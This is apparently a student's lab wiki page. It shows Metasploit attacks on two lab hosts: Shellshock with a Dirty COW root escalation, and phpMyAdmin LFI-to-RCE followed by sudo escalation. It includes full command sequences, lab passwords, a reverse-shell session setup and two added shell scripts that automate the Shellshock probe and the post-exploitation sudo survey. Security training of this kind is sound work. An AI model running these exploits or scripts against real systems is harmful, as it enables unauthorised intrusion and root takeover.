Lab 11.1: Metasploit Framework - squatchulator/Tech-Journal GitHub Wiki

Lab 11.1 - Metasploit Framework

It's important to understand some of the technical underpinnings of system exploitation before employing automated tools to do the work for us. Relying on a tool without understanding what it is doing, and the ramifications of using it, is a recipe for disaster; the term "script kiddie" describes this undesirable behavior. Metasploit is a sophisticated tool. It can greatly enhance the efficiency of a pen test, and it can be extended to deal with new exploits as they are discovered. Before launching an exploit, look at the Metasploit module's description and its Ruby source (info in msfconsole prints the description, references and authors; the .rb file itself shows exactly what gets sent to the target). In many cases they credit the work of someone who took the time to find the exploit by hand.

Honestly, this was so interesting to me because it's a little scary how simple it can be to get into a system this way. Metasploit is SO simple compared to hand-crafting exploits because people have already made the exploits for you, and in terms of learning I think this is a really powerful tool - but it could also be really dangerous. I think that uploading Exploit-DB exploits is a lot more powerful because that is updated so frequently and it's so easy just to do a google search to find them, but this is still really useful and powerful.

Cupcake

Recon

  • Check that the host Cupcake is up with ping 10.0.5.23
  • Perform a SYN port scan with sudo nmap -sS -vvv 10.0.5.23
  • Now that we know ports 22 and 80 are open, run another scan to check service versions: nmap -sC -sV 10.0.5.23 -p 22,80
    • Apache version is 2.2.15 - take note of this for later.
  • Run curl http://10.0.5.23 to see what the web root serves, then dirb http://10.0.5.23 to find any other URLs. Looks like there is a /cgi-bin/status URL, so the server is running CGI scripts.
  • Now search for exploits against this setup. Apache 2.2.15 itself is not the bug; an old Apache serving scripts out of /cgi-bin is the classic Shellshock target (bash executes code smuggled in through CGI environment variables such as User-Agent), which gives remote code execution. The Metasploit module for it is exploit/multi/http/apache_mod_cgi_bash_env_exec.
  • Spin up Metasploit with sudo msfconsole
  • Once Metasploit has started, enter use exploit/multi/http/apache_mod_cgi_bash_env_exec, read the description and references with info, and view the options available with options. This also shows the payload options you can use with the exploit. You can also run show payloads to see more.
set RHOSTS 10.0.5.23
set TARGETURI /cgi-bin/status
set LHOST eth0
set LPORT 443
* NOTE: RHOSTS is the option's real name; set RHOST also works because Metasploit treats it as an alias. LHOST accepts an interface name and resolves it to that interface's address.
  • Now run exploit to deploy the exploit! You should be met with a meterpreter prompt. Enter background and list your sessions with sessions -l (sessions -i needs a session ID and attaches to that session).
  • Re-attach to the session with sessions -i 1. You can check the user you landed as with getuid.
  • Start a basic shell with shell and upgrade it to a proper bash pty with python -c 'import pty; pty.spawn("/bin/bash")'
  • You can now run stuff like cat /etc/passwd, and check the kernel version with uname -a
    • Looks like the kernel is 2.6.32. Research some exploits for this kernel. We will use FireFart's Dirty COW (CVE-2016-5195) proof of concept, linked in the next step: a race condition in the kernel's copy-on-write handling lets an unprivileged user write to files it can only read, and the PoC uses that to rewrite /etc/passwd.
  • Once you have the exploit, download it to your LOCAL machine: cd Desktop and then wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c (wget treats every argument as a URL, so don't tack a destination path on the end; use -O if you want a different file name).
  • Back on Cupcake, press ^C to leave the shell channel and upload the exploit into a world-writable directory with upload /home/<user>/Desktop/dirty.c /tmp/dirty.c
  • Get back into the shell with shell and python -c 'import pty; pty.spawn("/bin/bash")'. cd /tmp, where dirty.c now lives.
  • Now, run gcc dirty.c -o exploit -lcrypt -lpthread (equivalent to the PoC README's gcc -pthread dirty.c -o dirty -lcrypt). There should now be a file called exploit in that working directory; gcc already makes it executable, so chmod +x exploit is harmless but not needed. Run it with ./exploit. The PoC prompts you for a password, then races to overwrite /etc/passwd with a new uid 0 user called firefart; because it is a race it can take a while and may need another try. Once it reports success, restart/re-enter the shell and su firefart with the password you chose to get root perms! You can cd into /root assuming all went well.
    • Clean up when you are done: the PoC saves the original file as /tmp/passwd.bak, and leaving a modified /etc/passwd behind (or a half-written one if the race went wrong) can lock everyone out of the box. Restore it with mv /tmp/passwd.bak /etc/passwd before you leave.
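Putting the Cupcake steps together, as an added example that is not part of the original lab notes: a small POSIX shell script that first confirms Shellshock by hand with curl (the "understand what the tool is doing" check the intro asks for), and only then writes the msfconsole commands above into a resource script and runs it non-interactively. The target address, URI, LHOST and LPORT are the lab's; the file name cupcake.rc, the RUN_PROBE switch and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original lab page): confirm Shellshock on
# Cupcake by hand, then drive the Metasploit module from a resource script.
# Assumptions: curl on the attacking box; msfconsole on PATH if you want the
# last step to run; 10.0.5.23 and /cgi-bin/status are the lab's values.

# Header value a vulnerable bash will evaluate: a function definition
# followed by a command. The first "echo" ends the CGI headers so the
# marker lands in the HTTP body, where we can look for it.
shellshock_header() {            # $1 = marker string
    printf '() { :; }; echo; echo %s' "$1"
}

# Return 0 only if the marker appears as a whole line of the body, which means
# the injected command ran. An error page that merely reflects the User-Agent
# would show the marker inside the full "() { :; }; ..." string, not alone.
response_is_shocked() {          # $1 = marker, $2 = response body
    printf '%s\n' "$2" | grep -qxF "$1"
}

# One probe against the CGI path. The marker is per-run so a cached or static
# page cannot produce a false positive.
shellshock_probe() {             # $1 = URL, e.g. http://10.0.5.23/cgi-bin/status
    marker="shock-$$-$(date +%s)"
    body=$(curl -s --max-time 10 -A "$(shellshock_header "$marker")" "$1")
    response_is_shocked "$marker" "$body"
}

# The msfconsole commands from the lab, written out so the run is repeatable.
# RHOSTS is the option's real name (RHOST is accepted as an alias);
# "exploit -z" backgrounds the session instead of dropping into it.
write_msf_rc() {                 # $1 rhost, $2 targeturi, $3 lhost, $4 lport
    cat <<EOF
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS $1
set TARGETURI $2
set LHOST $3
set LPORT $4
exploit -z
sessions -l
EOF
}

main() {
    target=${1:-10.0.5.23}
    uri=${2:-/cgi-bin/status}
    if shellshock_probe "http://$target$uri"; then
        echo "[+] $target$uri executed injected bash; writing cupcake.rc"
        write_msf_rc "$target" "$uri" eth0 443 > cupcake.rc
        command -v msfconsole >/dev/null 2>&1 && sudo msfconsole -q -r cupcake.rc
    else
        echo "[-] no Shellshock execution via $target$uri; read the module source before firing it blind"
        return 1
    fi
}

# Run as RUN_PROBE=1 ./cupcake_check.sh [target] [uri]; left off by default so
# the functions can be sourced and tested without touching the network.
if [ -n "${RUN_PROBE:-}" ]; then main "$@"; fi
```

The manual probe is the same trick the module uses, just with a harmless echo instead of a payload; if it comes back negative, the box is either patched or /cgi-bin/status is not a bash-backed CGI, and running the module anyway only adds noise to the target's logs.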

Nancurunir

Recon

  • Check that the host Nancurunir is up with ping 10.0.5.28
  • Now run a SYN scan to see what ports are open: sudo nmap -sS -vvv 10.0.5.28
    • Scan revealed that port 80 was open.
  • Now we can look for services running on that port with nmap -sC -sV 10.0.5.28 -p 80
    • Check the service versions, in this case Apache specifically. Not exploitable based on version. However, we exploited this target in the past and we know that it uses phpMyAdmin, which does have known exploits. For the sake of doing this lab fully, we'll do a dirb scan to find that URL rather than relying on memory.
  • Running curl http://10.0.5.28 dumps out the contents of the running webpage. Unfortunately, there's not a lot of useful info to glean other than the password stuff that we did in the previous lab (see Lab 10.2 to get the password).
  • Perform dirb http://10.0.5.28 to find the URL that we are going to exploit. This is luckily something we know exists beforehand: phpMyAdmin is installed at /phpmyadmin on this endpoint, so we will look up exploits for that.

Exploiting

  • Now that we know the exploit to use, run sudo msfconsole to start Metasploit.
  • Get our exploit going with use exploit/multi/http/phpmyadmin_lfi_rce. Run info to read what the module does, then options to get a table of the variables we will use for the exploit. To set these variables:
set RHOSTS 10.0.5.28
set PASSWORD shallnotpass
set USERNAME gandalf
set LHOST eth0
set TARGETURI /phpmyadmin
* NOTE: Metasploit sets TARGETURI to /phpmyadmin by default, so the last line only matters if the app lives somewhere else. USERNAME and PASSWORD are the phpMyAdmin login from Lab 10.2; the module logs in with them before it can reach the vulnerable code.
  • To get a list of payloads to test and use for our exploit, run show payloads.
  • Start up the exploit with exploit, and background after. Get the session back with sessions -i 1.
  • We can run a quick getuid to see the user we are running as (typically the web server's account), and sysinfo for the OS and kernel version; getuid by itself does not report service versions.
  • To start up a shell, simply run shell to spawn a quick little shell. To get a bash shell, run python3 -c 'import pty; pty.spawn("/bin/bash")'
  • We're in! And we know the password for gandalf is gandalfthewhite, so we can go ahead and elevate to that user with su gandalf.
  • Check what gandalf is allowed to do with sudo -l. Since this user has full sudo rights, it's as easy as running sudo su and entering gandalf's password again, and now we are the root user.
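The "we're in, now elevate" step from the Nancurunir run as an added example (not from the original lab notes): a script to paste into the shell Metasploit gives you, after su gandalf. It picks whichever python the box has for the pty trick (Cupcake had python, Nancurunir python3), reads sudo -l instead of assuming the user can reach root, and only then says how to get there. The sudo_root_from classifier and the survey function are my own; the only assumptions are a POSIX sh and sudo on the target, and the lab's gandalf/gandalfthewhite login.

```shell
#!/bin/sh
# Added example (not part of the original lab notes). Paste into the shell
# Metasploit handed you, after su gandalf, as: sh survey.sh gandalfthewhite
# Assumptions: POSIX sh and sudo on the target; the password is the lab's.

# Pick an interpreter for the pty upgrade; prints the first one found, or
# returns 1 if the box has no python at all.
pick_python() {
    for p in python3 python python2; do
        if command -v "$p" >/dev/null 2>&1; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# Classify `sudo -l` output. Prints one of:
#   nopasswd - (ALL) NOPASSWD: ALL, root without even typing the password
#   password - (ALL) ALL or (ALL : ALL) ALL, root once the password is given
#   partial  - some NOPASSWD entries but not everything; inspect them
#   none     - no usable sudo rights (or the user is not in sudoers)
sudo_root_from() {               # $1 = text of `sudo -l`
    if printf '%s\n' "$1" | grep -Eq '\(ALL( : ALL)?\)[[:space:]]+NOPASSWD:[[:space:]]+ALL'; then
        echo nopasswd
    elif printf '%s\n' "$1" | grep -Eq '\(ALL( : ALL)?\)[[:space:]]+ALL'; then
        echo password
    elif printf '%s\n' "$1" | grep -q 'NOPASSWD:'; then
        echo partial
    else
        echo none
    fi
}

# Run the survey: who we are, what kernel this is, how to get a real tty,
# and whether sudo is the way up. The password is fed to sudo -S on stdin
# so nothing prompts inside a half-working shell.
survey() {                       # $1 = current user's password
    id
    uname -a
    if py=$(pick_python); then
        echo "[*] pty upgrade: $py -c 'import pty; pty.spawn(\"/bin/bash\")'"
    else
        echo "[*] no python; try: script -q /dev/null"
    fi
    sudo_out=$(printf '%s\n' "$1" | sudo -S -l 2>/dev/null)
    case $(sudo_root_from "$sudo_out") in
        nopasswd) echo "[+] full NOPASSWD sudo: sudo -i gives root directly" ;;
        password) echo "[+] full sudo: run sudo su (or sudo -i) and enter the password again" ;;
        partial)  echo "[~] limited NOPASSWD entries; check each binary for a shell escape:"
                  printf '%s\n' "$sudo_out" | grep 'NOPASSWD:' ;;
        none)     echo "[-] no sudo route; fall back to kernel or service exploits (see Cupcake)" ;;
    esac
}

# Only run when given a password, so the functions can be sourced for testing.
if [ $# -gt 0 ]; then survey "$1"; fi
```

Passing the password as an argument puts it in the process list and shell history on the target, which is fine in a lab but is exactly the kind of artifact a real engagement's cleanup has to account for; reading it from a prompt is the quieter option.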